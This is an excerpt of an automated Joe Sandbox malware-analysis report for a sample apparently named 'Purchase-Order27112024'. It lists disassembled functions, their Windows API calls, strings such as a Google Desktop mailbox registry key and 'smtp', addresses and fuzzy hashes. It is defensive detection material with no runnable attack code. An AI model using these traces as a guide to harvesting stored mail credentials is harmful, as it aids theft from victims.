                                                                                                      • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: H
                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                      • API String ID: 438689982-3457389245
                                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: winRead
                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 4247780290-0
                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                      APIs
                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                      • String ID: smtp
                                                                                                      • API String ID: 2625860049-60245459
                                                                                                      • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                      • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                      • memset.MSVCRT ref: 00408258
                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                      Strings
                                                                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$EnumOpenmemset
                                                                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                      • API String ID: 2255314230-2212045309
                                                                                                      • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                      • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                      • String ID: S_@$l
                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                      • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                      • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy
                                                                                                      • String ID: C^@$X$ini
                                                                                                      • API String ID: 714388716-917056472
                                                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                      • String ID: MS Sans Serif
                                                                                                      • API String ID: 3492281209-168460110
                                                                                                      • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                      • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                      • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                                                                      • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClassName_strcmpimemset
                                                                                                      • String ID: edit
                                                                                                      • API String ID: 275601554-2167791130
                                                                                                      • Opcode ID: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                      • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                      • Opcode Fuzzy Hash: db8b236e199e929443ba679e8cc25b3238d768833fac675e2ea724ace2b39a9c
                                                                                                      • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_mbscat
                                                                                                      • String ID: 3CD
                                                                                                      • API String ID: 3951308622-1938365332
                                                                                                      • Opcode ID: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                      • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                      • Opcode Fuzzy Hash: ea07c3cf78fe23fa274cd57f6e103936ddd3628895d35173825c115ee7dc3945
                                                                                                      • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                      APIs
                                                                                                        • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 1860491036-0
                                                                                                      • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                      • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$memcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 368790112-0
                                                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                      • API String ID: 2221118986-515162456
                                                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
APIs
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
• memset.MSVCRT ref: 004026AD
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
  • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
  • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
  • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
• LocalFree.KERNEL32(?), ref: 004027A6
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
• String ID:
• API String ID: 3503910906-0
• Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
• Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
• Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
• Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
APIs
  • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
  • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
• strlen.MSVCRT ref: 0040B60B
• atoi.MSVCRT(?,00000000,?,76230A60,?,00000000), ref: 0040B619
• _mbsicmp.MSVCRT ref: 0040B66C
• _mbsicmp.MSVCRT ref: 0040B67F
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: _mbsicmp$??2@??3@atoistrlen
• String ID:
• API String ID: 4107816708-0
• Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
• Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
• Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
• Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
• _gmtime64.MSVCRT ref: 00411437
• memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
• strftime.MSVCRT ref: 00411476
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
• String ID:
• API String ID: 1886415126-0
• Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
• Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
• Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
• Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
Similarity
• API ID: strlen
• String ID: >$>$>
• API String ID: 39653677-3911187716
• Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
• Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
• Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
• Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
APIs
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
• memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
• memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
Strings
Memory Dump Source
• Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
